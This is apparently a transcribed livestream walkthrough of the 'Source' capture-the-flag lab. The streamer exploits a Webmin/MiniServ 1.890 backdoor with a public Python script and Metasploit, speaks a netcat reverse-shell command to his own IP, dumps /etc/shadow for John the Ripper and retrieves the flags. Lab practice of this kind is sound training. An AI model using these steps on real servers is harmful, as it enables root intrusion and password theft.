source. Let's go ahead and hop into source like real quick. Welcome if you're just joining after all that. We have about 13 minutes left. That's okay. And let's go ahead and cd into source there. Start a map scan and see if we get anything. We got port 22 there. We also had a port 10,000, right? So we got a port 10,000. We did just scan this not too long ago. And port 10,000 says error document files. Web server is running SSL mode. Try the URL. Blah. Okay. So do we have to do HTTPS maybe? Advanced. Accept the risk and continue. And yeah, it looks like we gotta do HTTPS. Okay. So we got webman. You must enter a username and password to log in on server. Alright. Let's see what this is all about. This webman. So let's go ahead and Control-Shift-O. Now if you're wondering how the heck did you figure out about port 10,000, we did do a scan earlier on this box. So and then we got kind of sidetracked. So there you go. There's your port 10,000 right there. So let's go ahead and do a search exploit on webman. Okay, we got a bunch of stuff on webman here. Arbitrary file disclosure, cross-site scripting bug. Huh, look at that. We don't know what version it is yet, do we? Do we have a readme.txt or anything like that? Okay, so no, we don't know what version it is just yet. We could always try to find a readme. Readme.txt. See if that exists. Brought me right back to here. We always try admin to sign in with, and that did not work. Okay, so now we got to start looking for what is this webman all about, right? So let's go ahead and actually look at that webman. Actually, you know, do an mmap scan on him. TACP 10,000, SCSV, and then the IP address that we want to attack. So we're going to try to figure out the version, everything like that. See if it's running anything else in the background, except for just webman. See if there's something else that's going on there. We do have an authenticated remote code execution. With Metasploit, might be able to use something like that. Let's actually open up MSF console. And we do have a remote code execution. Package updates, remote code execution. So 1.900, 1.910, 1.920. Seems like they didn't do a very good job getting rid of that unauthenticated code, but we still don't know what version we're running, right, of this guy. Let me go ahead just in case and add 1 hour. It's not going to take that long. Yeah, let's go ahead and search for webman. And we have all this, right? Let's go ahead and let's look at that unauthenticated one. Upload, that's authenticated. There wasn't an unauthenticated one up there, wasn't there? Package updated, remote code execution. Let's try these guys like right here. Let's go ahead and use him. Show options. Set our L host to 0, right? Username, webman username. But it says, oh, this one was authenticated. Which one's unauthenticated? Package updates, escape, bypass, arbitrary, unauthenticated. Like right there, that one's 1.920. It's in Metasploit. It's unauthenticated. Remote code execution. Password change, package updates. That one like right there is package updates one, right? So we're gonna use 3. I want to show the options for that one. Alright, we already, our host is already good. It still says username. It's supposed to be unauthenticated. This one like right here. I'm actually using the same one that was before, aren't I? Alright, well, what do we got up here? We got miniserve 1.890. We can always try that. So let's go ahead and search for miniserve. So at least we got something with that, right? I'll search for mini. Do we have anything like that? I think serve might be better. Have anything like that? No, okay. Well, search exploit for mini serve. And nothing there, but we do have mini serve 1.890. Let's go ahead and see if we got anything. Search for mini serve 890 exploit. See what we got. Exploit unauthorized remote code execution. So this, we do have something here. Is this the exact thing that I'm in like right now? Python 3 webmin blah blah. Okay. To use the script, you must have Python 3 curl in your operating system. Alright. Here's this GitHub link. Probably forward this one like right here. There it is. So let's go ahead and download this. We'll copy that. We'll store it in that folder that we have. So git clone. That guy like right there. Okay, cool. So let's go ahead and cd into webmin. And we'll go ahead and run this. So it's Python 3, is that right? And he had it running Python 3, boom, and then the host, port, and then command, huh? Okay, so the host, Python 3 or webmin, whatever, the host first, which our host is going to be right here, host, port, and then command. So we'll do host, our port was 10,000, and then command, we'll say ID, like quick, like who am I kind of thing, and that does work. So we are root. Wow. Could we, your password has expired and you must choose like an LS. Wow, okay, that does work. PWD. So that is, but sometimes it doesn't work. Password expired. Can we do like a netcat? Can we say like boom, then create like a netcat reverse shell? Let's cat my scripts and we'll look at netcat reverse shell. Or if we just do a really easy one too, like that. nc tacky / bin bash my IP address, right? ifconfig my IP address. And then I believe it's just the port, right? Yep, so 4242. And let's go ahead and do an nc tac lvmp 4242. That should be it, right? That's all I need for that one. Yep. Can I do that? Oh, I might actually want to turn it on, huh? Okay, so error, Perl execution failed. Your password is expired and new one must be chosen. So I think I need to make a new password. I don't know. I might be able to do something like a, we have that guy up and running. Let's try MSF console, because it seems to work with some of them, not with other ones. Because if I do an ID, that seems to work just fine, right? And then it's right there. Okay, I wonder if I could just do pass admin. Okay, let's go ahead and search for mini. I thought I did see something in here called mini. I thought I did at least. Mini stream, mini web upload, mini share. Look for mini serve, right? Huh. Much harder than what I thought it was going to be to find mini serve, especially with an exploit like that. That seems like something that they would have up and right on there. Might just be able to do search for webmin. Might be able to do that webmin backdoor, but I don't know what the username is. That thing, cat Etsy shadow. Can I do that? Okay, I can. Ooh, and we have a guy named Dark in here. Look at that. I still don't know a username and password, but this might help out a little bit. So let's go ahead and copy this whole file. All right, and we'll try to put that in John the Ripper, see if we can do anything with it. So we'll do a nano for pass.text. Don't want to throw that in there. And we'll do John wordless blah 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 on pass.text. Hopefully we don't need to do the whole shadow thing and everything like that, but I guess we will find out if we need to or not. But as of right now, I don't know what the password is just yet. Do we need, what is this webmin backdoor? What about backdoor? Can we do that? Use him, show options. And this one, like right here, it doesn't look like we actually need for webmin. So we found the miniserve exploit over here. We're able to dump some stuff, but it doesn't look like we're cracking it just yet. Set our host. Set our host as this guy, right? He would have 3 minutes if not, so whoopsie daisy. Okay, set our host. That's him. Okay, there we go. Set L host as ton 0. Set L host ton 0. Okay, yeah, that'll work too. Whatever. Our host set our port. Yes. Can we just run it now? Run. Okay, exploit no vulnerable. Set force exploit to override. Supposedly he's not vulnerable. SSL, set SSL to true, because those now changing SSL's options may require changing our port. No, it doesn't. Run it. It's still 10,000. Our port is still 10,000, and our SSL was true on that one, and we now have a command shell open. Cool, and we are root. CD in the root. CD in the slash root. That's a lot of stuff in slash root, isn't it? Jesus Christ. And from here we would find our flags and everything like that. CD slash home, I guess. Where am I? Can I not get anywhere else? You know what? I think I'm stuck in a... Let's do, which Python? Well, we know it has Python 3. We know that one for a fact, but which Python? Okay, so we do also have regular Python. Let's go ahead and throw in a full shell. I think I might be stuck in like a little thing here. Okay. There we go. Cool. Now we got it. So there's our root.txt. Let's go into home. CD in dark. And there's our user.txt. So we did find our home our root.txt, our user.txt. Sorry I couldn't do more on the King of the Hill room there. Did try my best. Sorry, I went slower than I thought I was going to. But hopefully you guys learned something. I learned I gotta move faster in King of the Hill. I never move fast enough. So what happens. But yeah, we were able to do everything that we wanted to do though with that, so that's good. We were able to get finished with that. With our source there, right there, if you're watching this on YouTube afterwards, it is going to be much shortened down, so you don't really have to worry that much about it. So yeah, that's about it. I hope everyone has a good one. Remember, tonight, if you're watching like right now, just remember that tonight we do have the Zero to Hero hacker stuff going on. So we'll go ahead and we're gonna start that 9 p.m. Okinawa time, and that's 8 a.m. Eastern Standard Time. All right. And also thank you to Robert for being the newest subscriber there. Subscribe during this video. Thanks a lot. So you guys have a good one, and I'll stick around for any questions. Alright, cool. Doesn't really seem like we have any questions or anything like that. So again, have a good one, and yep, I'll talk to you guys later.